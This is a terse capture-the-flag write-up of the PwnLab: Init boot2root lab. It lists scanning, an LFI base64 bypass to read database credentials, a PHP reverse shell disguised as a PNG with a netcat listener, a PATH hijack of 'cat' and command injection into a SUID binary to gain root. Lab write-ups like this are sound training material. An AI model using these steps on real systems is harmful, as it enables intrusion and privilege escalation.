pwnlab init writeup - PacketMonkey22/boot2roots GitHub Wiki
pwnlab-init-writeup
Nmap -A -T4 -p- $ip
Ports 111, 48170,51403, and 3306 (mysql)
Dirb $ip
Tried sql injection and basic LFI
Tried LFI base 64 bypass on upload page
Page refers to config page
LFI base 64 on config page
Username and password formysql
Mysql -h $ip -u root – p
Show databases;
Use $database;
Select * from $database;
Password base64 decode pass fields
Login then upload reverse shell
download pwnlab png
modify reverse shell then cat png/php >> shells.png
upload shells.png (view image, name changed)
tamperdata
confirmed Lang LFI
nc -nlvp 8888
lang image, success
whomai/id -- www-data
tty shell
login users - mike fails
kane has msgmike file
cat line in file. appears to running the command
try running, nothing
strings msgmike - cat /home/mike/msg.txt
$PATH
export PATH=/home/kane:$PATH
echo “/bin/sh” > cat
chmod +x cat
./msgmike
whomai/id - mike
cd ../mike
ls -al - msg2root file
./msg2root - runs what i enter as echo
./msg2root again - enter word; /bin/sh
whoami/id - root
cd /root
ls
cat flag.txt